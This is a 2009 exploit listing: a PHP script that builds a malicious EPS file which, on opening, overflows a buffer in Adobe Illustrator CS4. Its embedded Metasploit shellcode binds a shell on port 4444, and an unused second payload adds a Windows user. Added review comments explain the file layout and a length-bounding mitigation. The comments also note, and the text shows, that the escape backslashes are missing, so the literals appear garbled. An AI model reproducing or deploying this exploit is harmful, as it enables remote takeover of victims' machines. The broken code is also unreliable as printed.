
# Title : Adobe Illustrator CS4 v14.0.0 Encapsulated Postscript (.eps) Buffer Overflow Exploit
# Published : 2009-12-03
# Author : pyrokinesis


<?php
    // Proof-of-concept file generator. The script itself performs no parsing and no
    // network activity: it only concatenates the byte strings below into $_boom and
    // writes them to 9sg.eps (the file_put_contents() call at the bottom). The memory
    // corruption described in the header comment occurs inside Adobe Illustrator when
    // that file is opened, not in this script.
    //
    // NOTE(review): as shown on this page the string literals appear to have lost their
    // backslashes ("xda" where "\xda", "rn" where "\r\n", "x20" where "\x20" would be
    // expected), and the inner "AI11EPS" near the end sits unescaped inside a
    // double-quoted string. The listing is therefore unlikely to run as printed; it is
    // documented here as-is, without repairing the literals.
    //
    // Defensive reading: the trigger the author describes is a single DSC comment line
    // of more than ~42000 bytes (below: '%' + 41699 'A' + $_eip + 2291 'A'). A DSC
    // parser or content filter that bounds comment-line length would reject such a file
    // before any later section is reached; that is the generic mitigation for this class
    // of bug, independent of the specific product version.
    /*
    Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
    overlong DSC Comment Buffer Overflow Exploit
    by Nine:Situations:Group::pyrokinesis
    site: http://retrogod.altervista.org/
     
    An overlong string as DSC comment (more than 42000 bytes)
    results in a direct EIP overwrite.
    Exception is first-chance so the program will never crash.
    At the moment of the redirection EAX and ESI are user-controlled.
    This portion of the buffer begins with '%' (it is the next DSC
    comment) but as you can see the resulting pattern is 
    nop-equivalent.
     
    Tested and working against xp sp3
    change the call esi if you need, must be alphabetic
    I used a "call esi" from comctl32.dll on xp sp3,
    change if needed.
     
    Usage: php 9sg_illu.php
    then double-click on the resulting 9sg.eps file
    it will bind a shell on port 4444
    change the shellcode for your needs even.
     
    */
     
    # windows/adduser - 446 bytes
    # http://www.metasploit.com
    # Encoder: x86/alpha_mixed
    # EXITFUNC=seh, USER=adobe, PASS=kills
    # NOTE(review): $_scode_i is assigned but never referenced again in this file;
    # only $_scode_ii is concatenated into $_boom below.
    $_scode_i = "xdaxc9xd9x74x24xf4x59x49x49x49x49x49x49x49" .
                "x49x49x49x43x43x43x43x43x43x43x37x51x5ax6a" . 
                "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42" . 
                "x32x42x42x30x42x42x41x42x58x50x38x41x42x75" . 
                "x4ax49x4bx4cx4ax48x47x34x43x30x43x30x45x50" . 
                "x4cx4bx47x35x47x4cx4cx4bx43x4cx45x55x43x48" . 
                "x45x51x4ax4fx4cx4bx50x4fx44x58x4cx4bx51x4f" . 
                "x51x30x45x51x4ax4bx47x39x4cx4bx50x34x4cx4b" . 
                "x43x31x4ax4ex50x31x49x50x4ax39x4ex4cx4dx54" . 
                "x49x50x44x34x45x57x49x51x48x4ax44x4dx43x31" . 
                "x49x52x4ax4bx4ax54x47x4bx46x34x47x54x43x34" . 
                "x43x45x4ax45x4cx4bx51x4fx47x54x43x31x4ax4b" . 
                "x45x36x4cx4bx44x4cx50x4bx4cx4bx51x4fx45x4c" . 
                "x45x51x4ax4bx4cx4bx45x4cx4cx4bx43x31x4ax4b" . 
                "x4dx59x51x4cx47x54x44x44x48x43x51x4fx50x31" . 
                "x4bx46x43x50x46x36x45x34x4cx4bx47x36x50x30" . 
                "x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4d" . 
                "x4cx4bx42x48x43x38x4bx39x4ax58x4cx43x49x50" .
                "x42x4ax46x30x42x48x4cx30x4dx5ax44x44x51x4f" .
                "x45x38x4dx48x4bx4ex4cx4ax44x4ex51x47x4bx4f" .
                "x4dx37x42x43x42x4dx42x44x46x4ex45x35x43x48" .
                "x42x45x51x30x46x4fx45x33x47x50x42x4ex42x45" .
                "x42x54x51x30x43x45x43x43x45x35x43x42x51x30" .
                "x45x31x45x34x42x4fx42x42x43x55x47x50x42x4b" .
                "x45x39x42x4cx42x4cx42x53x51x30x46x4fx51x51" .
                "x47x34x50x44x51x30x47x56x51x36x51x30x42x4e" .
                "x42x45x44x34x47x50x42x4cx42x4fx42x43x45x31" .
                "x42x4cx43x57x43x42x42x4fx44x35x44x30x47x50" .
                "x47x31x42x44x42x4dx42x49x42x4ex45x39x42x53" .
                "x43x44x42x52x45x31x43x44x42x4fx44x32x44x33" .
                "x51x30x45x31x45x34x42x4fx43x52x42x45x47x50" . 
                "x46x4fx47x31x47x34x51x54x45x50x41x41";
     
    # windows/shell_bind_tcp - 696 bytes
    # http://www.metasploit.com
    # Encoder: x86/alpha_mixed
    # EXITFUNC=seh, LPORT=4444, RHOST=
    # This is the payload that actually ends up in $_boom (after the "%AAAAAAAA" marker).
    $_scode_ii = "x89xe5xdaxd0xd9x75xf4x5ex56x59x49x49x49x49" .
                 "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
                 "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" . 
                 "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
                 "x42x75x4ax49x4bx4cx43x5ax4ax4bx50x4dx4dx38" . 
                 "x4bx49x4bx4fx4bx4fx4bx4fx45x30x4cx4bx42x4c" .
                 "x46x44x51x34x4cx4bx47x35x47x4cx4cx4bx43x4c" . 
                 "x43x35x43x48x43x31x4ax4fx4cx4bx50x4fx42x38" .
                 "x4cx4bx51x4fx47x50x43x31x4ax4bx51x59x4cx4b" .
                 "x46x54x4cx4bx43x31x4ax4ex50x31x49x50x4ax39" .
                 "x4ex4cx4dx54x49x50x43x44x45x57x49x51x49x5a" .
                 "x44x4dx43x31x49x52x4ax4bx4cx34x47x4bx50x54" .
                 "x51x34x46x48x43x45x4bx55x4cx4bx51x4fx47x54" . 
                 "x45x51x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4b" . 
                 "x51x4fx45x4cx43x31x4ax4bx45x53x46x4cx4cx4b" . 
                 "x4bx39x42x4cx47x54x45x4cx45x31x48x43x46x51" .                  
                 "x49x4bx45x34x4cx4bx50x43x50x30x4cx4bx51x50" .
                 "x44x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50" .
                 "x43x38x51x4ex45x38x4cx4ex50x4ex44x4ex4ax4c" . 
                 "x50x50x4bx4fx48x56x45x36x50x53x43x56x45x38" .
                 "x50x33x46x52x45x38x44x37x43x43x47x42x51x4f" . 
                 "x51x44x4bx4fx4ex30x45x38x48x4bx4ax4dx4bx4c" .
                 "x47x4bx50x50x4bx4fx49x46x51x4fx4cx49x4ax45" . 
                 "x45x36x4bx31x4ax4dx43x38x43x32x51x45x42x4a" .
                 "x45x52x4bx4fx48x50x45x38x4ex39x44x49x4bx45" . 
                 "x4ex4dx46x37x4bx4fx48x56x50x53x46x33x51x43" .
                 "x51x43x46x33x51x53x46x33x51x53x46x33x4bx4f" . 
                 "x4ex30x45x36x45x38x42x31x51x4cx45x36x46x33" .
                 "x4bx39x4dx31x4ax35x42x48x4ex44x44x5ax42x50" . 
                 "x49x57x51x47x4bx4fx49x46x43x5ax44x50x50x51" .
                 "x51x45x4bx4fx48x50x42x48x49x34x4ex4dx46x4e" . 
                 "x4dx39x51x47x4bx4fx48x56x51x43x51x45x4bx4f" .
                 "x48x50x42x48x4dx35x51x59x4bx36x51x59x50x57" . 
                 "x4bx4fx4ex36x46x30x50x54x46x34x51x45x4bx4f" .
                 "x4ex30x4cx53x45x38x4dx37x43x49x48x46x44x39" . 
                 "x50x57x4bx4fx4ex36x46x35x4bx4fx4ex30x43x56" .
                 "x42x4ax43x54x42x46x43x58x45x33x42x4dx4dx59" . 
                 "x4dx35x43x5ax46x30x51x49x47x59x48x4cx4bx39" .
                 "x4dx37x43x5ax50x44x4dx59x4bx52x50x31x49x50" .
                 "x4cx33x4ex4ax4bx4ex47x32x46x4dx4bx4ex47x32" .
                 "x46x4cx4cx53x4cx4dx43x4ax46x58x4ex4bx4ex4b" .
                 "x4ex4bx43x58x42x52x4bx4ex48x33x44x56x4bx4f" .
                 "x44x35x47x34x4bx4fx48x56x51x4bx51x47x46x32" .
                 "x46x31x50x51x50x51x42x4ax45x51x50x51x50x51" .
                 "x51x45x50x51x4bx4fx4ex30x42x48x4ex4dx49x49" .
                 "x43x35x48x4ex51x43x4bx4fx49x46x43x5ax4bx4f" . 
                 "x4bx4fx50x37x4bx4fx4ex30x4cx4bx46x37x4bx4c" . 
                 "x4dx53x48x44x45x34x4bx4fx4ex36x50x52x4bx4f" . 
                 "x4ex30x42x48x4ax50x4dx5ax44x44x51x4fx50x53" . 
                 "x4bx4fx4ex36x4bx4fx48x50x41x41";
     
    // Bytes placed at the EIP-overwrite offset (immediately after the 41699-byte 'A'
    // run below). The author states the value must consist of alphabetic bytes because
    // it lives inside a DSC comment; the trailing comment records where the address was
    // taken from on the author's test system (specific to that OS/DLL build).
    $_eip = "x57x6bx41x77"; //0x77416b57 alphabetic call esi, comctl32.dll
     
    // Layout of the generated file, top to bottom:
    //   - a short binary prefix (the leading C5 D0 D3 C6 looks like the DOS EPS binary
    //     header magic, followed by section offsets/lengths -- presumed, not verified here);
    //   - "%!PS-Adobe-3.1 EPSF-3.0" and an encoding line;
    //   - the overlong DSC comment: '%' followed by 41699 'A', then $_eip, then 2291 'A';
    //   - a %Title line, the "%AAAAAAAA" marker the inline comment describes as the
    //     jump target, then $_scode_ii and a short ": A" tail;
    //   - ordinary-looking DSC / AI header lines so the file still resembles an
    //     Illustrator-generated EPS.
    $_boom = "xc5xd0xd3xc6x20x00x00x00x05xc8x04x00x00x00".
             "x00x00x00x00x00x00%xc8x04x00xb5Ix01x00xff".
             "xffx00x00".
             "%!PS-Adobe-3.1x20EPSF-3.0rn". 
             "%ADO_DSC_Encoding:x20Windowsx20Romanrn".
             "%". // start of the overlong DSC comment line
             str_repeat("A", 41699). 
             $_eip. 
             str_repeat("A", 2291). 
             "%Title:x20Untitled-1.epsrn". 
             "%AAAAAAAA". // we jump here, nop-equivalent
             $_scode_ii. 
             ": Arn". 
             "%%For:x20aliasrn". 
             "%%CreationDate:x2011/27/2009rn".
             "%%BoundingBox:x200x200x20227x20171rn". 
             "%%HiResBoundingBox:x200x200x20226.5044x20170.3165rn".
             "%%CropBox:x200x200x20226.5044x20170.3165rn". 
             "%%LanguageLevel:x202rn". 
             "%%DocumentData:x20Clean7Bitrn". 
             "%ADOBeginClientInjection:x20DocumentHeaderx20"AI11EPS"rn". 
             "%%AI8_CreatorVersion:x2014.0.0r".
             "%AI9_PrintingDataBeginr".
             "%ADO_BuildNumber:x20Adobex20Illustrator(R)x2014.0.0x20x367x20Rx20agmx204.4890x20ctx205.1541r".
             "%ADO_ContainsXMP:x20MainFirstr". 
             "%AI7_Thumbnail:x20128x2096x208r". 
             "%%BeginData:x204096x20Hexx20Bytesr". 
             "%0000330000660000990000CC0033000033330033660033990033CC0033FFrn";
    // Written to the current working directory; the return value (false on failure,
    // otherwise the byte count) is not checked, so a write error goes unnoticed.
    file_put_contents("9sg.eps", $_boom);
?>